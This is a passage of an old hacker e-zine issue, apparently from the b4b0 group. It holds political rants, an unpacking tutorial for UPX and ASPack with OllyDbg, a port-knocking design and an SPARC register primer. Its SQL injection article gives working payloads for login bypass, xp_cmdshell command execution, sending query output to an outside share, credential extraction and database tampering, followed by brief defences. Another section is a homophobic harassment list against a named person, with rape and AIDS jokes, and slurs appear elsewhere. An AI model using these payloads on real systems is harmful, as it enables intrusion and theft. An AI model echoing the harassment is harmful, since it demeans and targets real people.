Copy Link
Add to Bookmark
Report
L'elephants avec les trunks huge 01
l'elephants avec les trunks huge
izzue un
___ ___
/ \____/ \
/ / __ \ \
/ | .. | \
\___/| |\___/\
| |_| |_| \
| |/|__|\| \
| |__| |\
| |__| |_/ / \
| @ | | @ || @ | '
| |~~| || | -The jelqing elephant-
'ooo' 'ooo''ooo'
"don't make fun of the circus animals!"
* death to capitalism * feed the socialists * bush is evil *
* let's all do drugs * working is for capitalists *
* les francais toujours! *
--------------------------------------------
# Un - l'Introduction
Bonjour et valkomen to izzue un of 'l'elephants avec les trunks huge'.
Before we commence, some shout outs are in order:
SHOUT OUTZ: #b4b0, chrak (for the drugz), #phrack, #2600, tymat.
\ /
31337
Et maintenant pour les zine..... what can we say for intro? Dunno...
how about DOWN WITH CAPITALISM! IF YOU VOTED FOR BUSH YER ST00pID or
something. FRANCE IS NUMBER UN! EVERYONE DO DRUGS AND NOBODY WORK
AND LET'S ALL BE FAGS AND DO WHATEVER WE WANT WITH NO RESTRAINT! IT IS
THE ONLY LOGICAL WAY!!! MORALS == ARBITRATION! ANARCHHYYYYYYYYY
ANARCHYYYYYY FOREVERRRRRRRRRRRRRRRRR WE ARE EDUCATED YEW ARE NOT HAHA!
Also please drive hydrogen powered cars and wear beads and smoke pot
and denounce anything that becomes even mildly popular. Remember, YOU
are ENLIGHTENED!!! You may not be able to explain exactly why you hate
structure and order and things that have been proven by time, but WHO
CARES?!?!?!?! WE ARE IN THE 21st CENTURY AND ARE BETTER THAN THE CAVE
MEN THAT EXISTED ON EARTH 100 YEARS AGO. SO YOOOOOOOOOO0000000000000.
IF YOU DO DRUGS ITZ OK CAUSE SOCIETY WILL PAY TO PUT YOU IN THE HOSPITAL!
WERDDDDDDDD TO SOCIALISM! YAY CANADA!
Idiots. Read on you fucking socialist leaches. FREE KEVIN!
We worked hard to bring you this zine! Thanks to contributors!
No matter what contributors or b4b0 or anyone else may say, this is
100% grade-A original! They are just jealous capitalists who probably
carry guns *shiver*.
As you will no doubt notice, there's nothing particularly substantive
in here. Mainly dribble copied and modified slightly from computer
books and online texts. BUT WHO CAREZZZZZZ?!?!?!?! We're here for PROPS
and THATZ IT!!@#$
brought to you by: l'elephants and so forth
memberz: wouldn't you like to know?
...and a generous grant from the Karl Marx Foundation
"Every time I see a gun I piss my pants" -- our founder
*****************************************************************************
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
*****************************************************************************
WORLD NEWS:
"...The ascii icons foundation wishes to welcome its newborn member,
totally fag-free, worksafe ATI© icon.
ATI©, or the ASCII Thinking Icon which is represented by these three
caracers consecutively:
: double-point (<-- french)
D open mouth that adds the twist of fun to the mix
? the innovative hand-scratching-chin imitation of real life deep thinking
situations posture..."
:D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D? :D?
The ascii thinking icon " :D? " © is published
under the GNU public Lisence.
and could be distributed, used, published
and implemented in your IRC chatting lexic according to the GPL.
examples on how to implement this 0day tech/art module in your IRC chatting:
example #1
<ttransien> h0h0
<ttransien> hm should i take a piss
<ttransien> :D?
example #2
<w01f> this code you just sent me doesnt compile well
<w01f> I think it needs reviewing
<w01f> :D?
Have fun with it!
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
'lelephants BRINGING DIRECTION TO YOU
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
.[ #b4b0 @ efnet re-opened for public and gay as ever ].
WERD TO LES ANIMAUX!!@#$
.-------->[FREEWAY OPEN:B4B0]<----------.
| ROAD CONDITIONS |
V $
[*] 59 North CAUSION: Hevy Dope Fog |
+ ph1x $
[x] E18 East OPEN: CAUSION SWERVED |
+ rdxz $\
[u] 99 North OPEN: Slight Winds | \
+ crypt1 $ \
[o] 10 West OPEN: Delivering Your Milk |______\________
+ MiLk-MaN $_______________|
[+] 91 South CLOSED: Banging Your Mom | / | |
+ tsai $ / | |
[z] | / | _|_____________________________
+ $ / | |
[%] Route 20 East CAUSION: ROAD WORK | | | rdxz moms house: 3,334 miles
+ cervix $ | | ph1x drug lab: 1.45 miles
[i] 49 North Closed: Flooding | | | San Fransisco: 534 miles
+ polder $ | | m4tts house: 535 miles
[+] 50 West Closed: Rock Slide | | | House of Kung Foo: -20 miles
+ lusta $ | | h00kahs Canadian House
[%] 1 South Open: Mexico Bound | | | Of Bacon: Not Far enough
+ p4bell $ | | gH Jail Cell: 734 miles
V | | |
| | | |______________________________|
`------->[ We Be Grubbin !!! ]<--------' | | || ||
| | || ||
| | || ||
| | || ||
.......[ issue # 011 7/05].....................................|___|........||.............||
[I]=[0x00] INTRO .x.[chrak].x. [*]
:S: :*:
[S]=[0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x. [B]
:U: :4:
[E]=[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x. [B]
:*: :0:
[#]=[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x. [H]
:0: :E:
[1]=[0x04] Re-Designed Port Knocking Security .x.[crypt1].x. [H]
:1: :B:
[*]=[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x [4]
:*: :B:
[*]=[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x [0]
: : :*:
[*]=[0x07] How to build a leet recording spy kit .x[wolfinux].x [4]
: : :L:
[*]=[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x [I]
: : :F:
[*]=[0x09] Making the Perfect Summertime Lemonade .x[t.Transient] [E]
: : :*:
[*]=[0x0A] EMPTY SPACE HERE [*]
:.:......................................................................................'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x00] INTRO .x.[chrak].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
OFFICIAL b4b0 drink: summertime lemonade
PEICE ABOUT b4b0 10 BEING MORE SHITTY THEN THIS AND BEING SKIPPED TO 11
WELL WELL WELL THIS IS WHERE THE INTRO IS GOING.
yes we are having http://www.chrakworld.com pimped in this issue.
.
.
.
.
.
.
.
.
[lelephant note: .... what?]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x01] Learning To Hate People With MoNEy .x.[UNKNOWN].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[Another fine article brought to yuo by b4b0!!!!1!! -ed]
Welcome people, is about Big Money Bullshit. I don't know about everyone else,
but i can tell you, that it pisses me the fuck off,every time i see one of thoughs<sic>
"Self Serv Checkout Registers". I've seen them in a few places now. Mostly companies
like Walmart and Home Depot are starting to eliminate HUMAN work. For these bullshit
self checkout systems. Now its bad enough that these companies move into every town
and take out mom&pop shops where, they buy things in bulk and sell them for a discount
. But to take away jobs, i feel this should be a human right concern. I can understand
Teknology but where do you draw the line. Most places use 4 - 8 self serving registers
which are monitored by 1 real person. That means 3-7 jobs are taken away from one store
at one shift. So lets say they have 2 shifts thats 6 to 14 jobs per store.
Now if u want to get realy teknical lets look at how many of these stores there are.
Im gong<sic> to just give a uneducated guess. For the sake of argument lets say theres
1,000 Walmarts, (everyone knows theres more). now thats 14,000 jobs they just elminated.
Lets do some math. now 14,000 * 10$hr = $140,000 * 8 = $1,120,000 day * 7 = 7,840,000
week.. ect. Now thats alot of money you say. I say thats pocket change for the amount of
jobs that are being taken away for such a simple idea. Thats just greed, they already
have a huge margin of business, why do they need to take jobs away from us. What i would
like to know when its enough?, or whats next?
Are we going to be going to school though our computers or Tv's? Dam, waitthat shits
already im<sic> progress.... How lazy are we becomming? I hope someone is as pissed
off about this shit as i am.
I hope im not the only one that this shit bothers. I mean think about it, these
companys<sic> are just having us shop in a warehouse, checking our self out , just
having someone make sure we arent stealing and thats it. Anyways I'm done bitching, i
just think this shit is FUCKED UP.
.
.
.
.
.
.
.
.
[lelephant note: How profound.]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x02] aspack unpacking with OllyDbG / upx unpacking with OllyDbG .x.[dvdman].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Software used: UPX 1.24, OllyDbg , OllyDump, Imprec
I have seen lots of tuts for UPX and they make things quite crazy/complex so I
made this little tut just to show/teach
you all how simple it is and allow any kid to do it :P Ok, so here goes
The start of any upx packed exeuctiable will look like this in OLLYDBG
(PACKER ENTRY POINT) - PEP
60 pushad
BEAEB04000 mov esi,xxxxxxx
8DBE525FFFFF lea edi,[esi+xxxx]
57 push edi
83CDFF or ebp,-001
EB10 jmp xxxxxx ;Unpacking Loop (useless to follow)
In all other tuts I have seen the authors make you follow this jmp and follow t
he instructions to find the OEP. I know
its a usefull idea to teach you about other packers but hell we just want to un
pack UPX dont we :P So scroll down a bit
and you will see something like the following:
(UNPACK INSTRUCTIONS)
FF96 D0AE0100 CALL DWORD PTR DS:[ESI+1AED0]
61 popad ;Restore Registers
E90826FFFF jmp xxxxx ;(OEP) Of The Unpacked Program
Goto the line with the POPAD and put a breakpoint using f2. Then press F7 one t
ime and you will land on the JMP XXXX
instruction this is our OEP so remember this. Now press F7 one more time and it
will land you in the REAL UNPACKED code.
Wow that was hard wasnt it? ok now click plugins->ollydump->Dump Debugged Proce
ss. Leave all the options alone and note
the Entry point value which is next to the (GET EIP as OEP) button. OK, now we
have a unpacked exe file which does not
run. So whats your first guess what we need to fix? IMPORT TABLES correct your
a genious now. So lets fire up Imprec
and fire up the orig packed program and attach to the orig proccess. Remember t
hat address I told you to note? ok type
it into the (OEP) box do not worry about adding in the zeros it will do it for
you. Mine was (6AE0) so I enter it in. Now
click IAT auto search and wait a second. Now click (Get Imports). click show in
valid and if you see any that say
( VALID:NO ) Press the (Auto Trace) button and wait. now click (Fix Dump) and s
elect the unapcked file you saved. WHOLA,
we are done and the program is now unpacked and running. You may want to remov
e the UPX0 tags in the headings but i
wont get into that here.
NOTES: sorry to all you unpacker gods, for not making this super complex for al
l the newbs :P
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Software used: ASPACK (any version), OllyDbg , OllyDump, Imprec
I have seen lots of tuts for ASPACK and they make things quite crazy/complex so
I made this little tut just to show/teach
you all how simple it is and allow any kid to do it :P Ok, so here goes
The start of any aspack packed exeuctiable will look like this in OLLYDBG
(PACKER ENTRY POINT) - PEP
01013001 > 60 PUSHAD
01013002 E8 03000000 CALL NOTEPAD.0101300A
01013007 -E9 EB045D45 JMP 465E34F7
0101300C 55 PUSH EBP
0101300D C3 RETN
In all other tuts I have seen the authors make you follow this call and follow
the instructions to find the OEP. I know
its a usefull idea to teach you about other packers but hell we just want to un
pack ASPACK dont we :P So scroll down a bit
and you will see something like the following:
010133AF 61 POPAD <-- break point
010133B0 75 08 JNZ SHORT NOTEPAD.010133BA <--- F7
010133B2 B8 01000000 MOV EAX,1
010133B7 C2 0C00 RETN 0C
010133BA 68 E06A0001 PUSH NOTEPAD.01006AE0 <-- will land here an
d press F7
010133BF C3 RETN <--- F7
*hint* in olly you can press CTRL-B and type in 61 75 in the HEX +02 box and it
will find this for you. How cool for olly ;)
ok, so set a break point on the popad and press f9 to run the program and it sh
ould break on this spot then f7 till you
hit the push and then f7 into the ret and then dump.
01006AE0 6A DB 6A ;
CHAR 'j'
01006AE1 70 DB 70 ;
CHAR 'p'
01006AE2 68 DB 68 ;
CHAR 'h'
01006AE3 88 DB 88
01006AE4 18 DB 18
will look something like this all messed up. You can press CTRL-A to analsys th
e code to see what it looks like.
After you do the dump you will need to fix it with imprec. I will not cover thi
s process here. I may write a howto for imprec someday.
NOTES: sorry to all you unpacker gods, for not making this super complex for al
l the newbs :P
MORE TUTS COMMING SOON
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x03] Basic SQL Injection Tekneeqs and Protection .x.[dieSLoW].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#b4b0 - diesl0w [05/19/04]
--
TABLE OF CONTENTS
Chapter 1 - Introduction
Chapter 2 - What To Look For?
Chapter 3 - Vulnerability Testing
Chapter 4 - Get Remote Execution
Chapter 5 - OUTPUT via SQL Query
Chapter 6 - Updating/Inserting Data into the database
Chapter 7 - Protecting against SQL Injection
Chapter 8 - Other Places To Visit
Chapter 9 - Shout Outs
Summary:
The following article will get your foot in the door with the basic SQL Injection techniques and attempt to help you fully understand the methods used to prevent attempts and/or to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques and to protect themselves from such attacks.
--
Chapter 1 - Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner wont return anything useful, and you know that the admin always patch his server, we have to turn to finding vulnerabilities in their web server. SQL injection is one type of web server intrusion that requires nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
This article does not introduce anything new, SQL injection has been widely written and used in the wild. The article was written basically because we would like to document some of techniques used during SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the Chapter 8, Other Places to Visit" for people who truly deserve
credit for developing many techniques in SQL injection.
1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and
make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to
the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
--
Chapter 2 What To Look For?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> have potential parameters that might be exploitable.
--
Chapter 3 Vulnerability Testing
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://exploitable.host.com/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL
and hidden field accordingly. Example:
<FORM action= http://exploitable.host.com/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get login without any login name or password.
--
Chapter 4 Get Remote Execution
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
--
Chapter 5 OUTPUT via SQL Query
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
5.1 Grabbing Data
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we
want from the database.
Now, let's get the first login_name from the "admin_login" table:
http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "diesl0w" from the database:
http://exploitable.host.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='diesl0w'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'temp123' to a column of data type int.
/index.asp, line 5
We can now login as "diesl0w" with his password "temp123".
--
Chapter 6 Updating/Inserting Data into the database
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'temp123' WHERE login_name='diesl0w'--
To INSERT a new record into the database:
http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "diesl0w" with the password of "temp123".
--
Chapter 7 Protecting against SQL Injection
Filter out characters like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
--
Chapter 8 - Other Places To Visit
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml
Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm
--
Chapter 9 - Shout Outs
Just want to give a shout-out to the following:
All old school gH members, might have split and went seperate ways, but not forgotten..
#cha0s @ Unet, #innuendo @ Unet, #LinuxHQ @ Unet/EFnet, #coders @ EFnet, #b4b0 @ EFnet, #sketchy @ EFnet, #hurricane @ EFnet
zeb0r, exempt, clops, icbm, mosthated, mindphasr, REWN, and my people helping out on EFX Inc.
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x04] Re-Designed Port Knocking Security .x.[crypt1].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Hello everyone, im crypt1, ill be your guid through this artical.
Basicly im going to be expressing some old ideas, some recent ideas, and kind of
give a few new ideas.
Lets start out on some old ideas. Now im assuming everyone reading this will
have a basic understanding of port knocking / os fingerprinting.
But before you run off just take a little trip with me :>. I was sitting
back for a few days playing with O/S detection and the concept of Port Knocking.
I figured that port knocking is a good idea, but needs improvements. Well i kind
of came up with a new design or a way of doing port knocking.
As some of u might know Port Knocking is usaly setup on a system to open
closed services to privilaged (Private) users. The way most people set up port
knocking is they have a firewall with a set of ports if not all ports firewalled, then
they have a perl script tailing the log file of the connect()'s tried. Well when
a sequence lets say ours is port 6 24 18 10 78 441 5 1, when throughs ports are tried
scanned in x amount of time, our perl script would then tell the firewall to allow
this ip address access to a certain port. Well thats just fine and dandy. There is
some security in that. Which is just one layer of security. But heres where we
start to add to the idea.
What if we were to create a private reply seq:
NMAP PRINT OUT:
(NORMAL SYSTEM READOUT)
(FAKE SYSTEM ID:x.b4b0.corenetwork.co.va.rz.moon.crazy)
TSeq(Class=TD%gcd=<00F4%SI=<00F4%SI=<VE%IPID=I%TS=P)
T1(DF=N%W=B680%ACK=S++%Flags=AS%Ops=M)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
# FROM nmap-os-fingerprints FILE!
# TEST DESCRIPTION:
# Tseq is the TCP sequenceability test
# T1 is a SYN packet with a bunch of TCP options to open port
# T2 is a NULL packet w/options to open port
# T3 is a SYN|FIN|URG|PSH packet w/options to open port
# T4 is an ACK to open port w/options
# T5 is a SYN to closed port w/options
# T6 is an ACK to closed port w/options
# T7 is a FIN|PSH|URG to a closed port w/options
# PU is a UDP packet to a closed port
(MODIFIED KERNEL TSEQENCING)
(NEW FAKE SYSTEM ID: x.b4b0.corenetwork.co.va.rz.moon.crazy)
TSeq(Class=TD%gcd=<00F4%SI=<00F4%SI=<VE%IPID=I%TS=U)
T1(DF=N%W=R6883%ACK=S++%Flags=AS%Ops=M)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
to O/S Detection and
and the Perl script run it against the client , which would then tell the server
if this host is truly the private client or just some hacker trying to gain access
to the server.
Granted we used more ports for our first layer but they can be sniffed
but then u ask your self ok well, so can the reply of the o/s detection right? right.
so how do we then determain if the host is the trusted host. Well Im getting to that.
On top of the new o/s detection function we have just added lets add a
authinication algorithm, but lets base it off of something cool,
(NOTE: this is just a suggestion),
Lets do a 2 time stamp PING TO Client -> Server, PING TO Server ->client:
Server:
64 bytes from priv.serv (0.0.0.0): icmp_seq=1 ttl=49 time=33.0 ms
64 bytes from priv.serv (0.0.0.0): icmp_seq=2 ttl=49 time=31.5 ms
(NOTE: Lets Average out Time with 2 requests: 32.25 )
(USAGE: We will send 32.25 vaule to the client via Stunnel , which will be the clients key for its algorithm)
CLIENT:
64 bytes from priv.client (0.0.0.0): icmp_seq=1 ttl=49 time=32.7 ms
64 bytes from priv.client (0.0.0.0): icmp_seq=2 ttl=49 time=30.6 ms
(NOTE: Lets Average out Time with 2 requests: 31.65 )
(USAGE: Key assigned by Server: 32.25 (Client: MSG: 31.65)
We can then Note that the ping vaule wont be to far apart
(we could even go more into this but i wont now)
, which would set our vaules for our Pre set algorithm :).
Once Authinicated though that, You Could then Setup a USER/PASSWD port for
another method of security using a SSL type Connection. It Just depends how
Sensitive you want to be with your network :).
Now Lets kind of lay this all out on how to make something like this:
Client Script: (NOTE: U WILL WANT TO USE A REAL SCRIPTING LANGUAGE! HEH)
value = run(./authinicate) // RUN AUTHINICATION SCRIPT
if(vaule = 1) { program failed } // GET VAULE OF AUTHINICATION SCRPIT
if(timeoutvalue = currentime) { loop(tryagain!) } // IF AUTHINICATION SCRIPT TAKES X TIME RETRY
else { // ELSE
./$myprogram // IT WORKED NOW CONNECT TO X PORT WITH UR PROGRAM
}
Client AUTH SCRIPT: (NOTE: THIS ISNT A REAL SCRIPT JUST GIVES IDEA HOW TO DO IT)
connect(PORTs) // CONNECT TO PORTS IN SEQENCE!
ping(serv) // PING FOR ENCRYPTION MSG
getkey(thekey) // GET KEY FROM SERVER FOR ENCRYPTION
encrypt(thekey,pingvaule); // ENCRYPT PING VAULE WITH KEY VAULE GIVEN
send(encrypt-msg); // SEND ENCRYPTED MSG WITH KEY VAULE SENT FROM SERVER
return(vaule) // RETURN VAULE OF SUCCESS OR *
Server Script: ( NOTE: U WILL WANT TO CREATE UR OWN REAL SCRIPTS )
fmsg = tail_firewall_log() // TAIL THE LOG FILE FOR CONNECTS():
parse(fmsg) // CREATE A PARSE FOR YOUR TAIL (LOOK FOR UR CONNECT SEQENCE)
match(ports) // IF PORTS MATCH
if(portvaules = private_user) // IF PORTS MATCH DO THIS
fingerprint(pr-user) // FINGER PRINT USER FOR SPECIAL TCP SEQENCE
{if (pr-print = pr-pr-print) { // IF FINGER PRINT MATCHS SPECIAL TCP SEQENCE
getpingdelaytime(pr-user) // GET PING TIME FROM CLIENT CONNECTING
send(pr-user,key) // SEND AVERAGE AS KEY ALGORITHM VAULE!
get_responce() // GET RESPONCE FROM ALGORITHM KEY
if(resp-pr-user= correct){ openfirewall(user-ip,service)} // IF MATCHS OPEN PORT FOR THIS CLIENT ONLY!
}
Current Software that acomplish parts of this:
FPF: "Fingerprint Fuck" www.packetstormsecurity.nl
NOTES: Fingerprint Fuck changes your Fringerprint information, its a LKM, so depending on Kernel version u might
need to add suport.
knock: "Port Knocker" www.packetstormsecurity.nl
NOTE: This software is just one example of port knocking.
MAIN NOTE: Please Realize that both software listed above are just starting points for this project,
both programs should just be used as a refrence point if u dont understand how to do something.
The programs listed would need alot of modification to acomplish this task.
JUST ANOTHER B4b0 PRODUCTION [ CRYPT1 ]
(Obsecurity isnt security, but what if we add security to obscurity would it be security then? :) )
*(NORTH)**(SOUTH)**(EAST)**(WEST)**(WEST)**(EAST)**(SOUTH)**(NORTH)**(SOUTH)**(EAST)**(WEST)**(NORTH)*
* [0x01 UNKNOWN AUTHOR IntroDucktion Learning To Hate People With MoNEy *
*(NORTH)**(SOUTH)**(EAST)**(WEST)**(WEST)**(EAST)**(SOUTH)**(NORTH)**(SOUTH)**(EAST)**(WEST)**(NORTH)*
Welcome people, is about Big Money Bullshit. I don't know about everyone else,
but i can tell you, that it pisses me the fuck off,every time i see one of thoughs<sic>
"Self Serv Checkout Registers". I've seen them in a few places now. Mostly companies
like Walmart and Home Depot are starting to eliminate HUMAN work. For these bullshit self checkout
systems. Now its bad enough that these companies move into every town and take out mom&pop shops where
, they buy things in bulk and sell them for a discount. But to take away jobs, i feel this should be a
human right concern. I can understand Teknology but where do you draw the line. Most places use 4 - 8
self serving registers which are monitored by 1 real person. That means 3-7 jobs are taken away from
one store at one shift. So lets say they have 2 shifts thats 6 to 14 jobs per store.
Now if u want to get realy teknical lets look at how many of these stores there are. Im gong<sic>
to just give a uneducated guess. For the sake of argument lets say theres 1,000 Walmarts, (everyone
knows theres more). now thats 14,000 jobs they just elminated. Lets do some math. now
14,000 * 10$hr = $140,000 * 8 = $1,120,000 day * 7 = 7,840,000 week..
ect. Now thats alot of money you say. I say thats pocket change for the amount of jobs that are being
taken away for such a simple idea. Thats just greed, they already have a huge margin of business, why
do they need to take jobs away from us. What i would like to know when its enough?, or whats next?
Are we going to be going to school though our computers or Tv's? Dam, waitthat shits already im<sic>
progress.... How lazy are we becomming? I hope someone is as pissed off about this shit as i am.
I hope im not the only one that this shit bothers. I mean think about it, these companys<sic> are just
having us shop in a warehouse, checking our self out , just having someone make sure we arent stealing
and thats it. Anyways I'm done bitching, i just think this shit is FUCKED UP.
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[ED NOTE: crypt1 must be Ghey to make this but we need Quality Content
to fill our pages!]
.-~'~.
(.~ `. < To MucH D1ck From the NigHT b4
I x O ) g0t (_o_) ?: m4tt [tm]
| __ /
`\ U .`
`~`
10 TOP THINGS YOU DONT NEED TO KNOW:
10. M4tts Gay.
9. He has Aids.
8. Reverting back to 10, m4tt likes ass.
7. Matt has recived a Reward from the Insitute of Cock suckers
for not chocking on a 8 1/2 dick.
6. Matt puts out an add in the San Fransisco Times offering
money to be gang raped.
5. Matt gets arrested for suliciding sex.
4. Matt is gang raped while in jail with a chizzel.
3. No one likes gay matt.
2. Matt keeps begging to be in b4b0.
1. Baned for being gay #b4b0 m4tt@smokin.crackrock.net
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
The meaning of this article is to put together various information
and make a reasonable article about understaind Sparc stacks and
registers.
Sparc got 32 general purpose integer registers visible to the program
at any time. From these 32, 8 registers are global, and 24 registers
are in a register window. One window consists of 3 groups of 8 registers,
the out, local and in registers.
A sparc implementation can consist of 2 to 32 windows, even thou the
most consists of 7 or 8 windows. The registers variable number is the
main reason sparc is "scalable".
The only 1 window that can be visible is determined by the CWP (current
window pointer, which is part of the processor status register (PSR)).
This is a five bit value that could be decremented/incremented by SAVE
and RESTORE instructions. Those instructions are executed on procedure
call and return. Basic idea being that the in registers contain incoming
parameters, the local register make scratch registers, the out registers
contain outgoing parameters and the global registers contain values that
doesn't vary much between executions. The register windows overlap partially
so the out registers become renamed by SAVE to become the in registers of
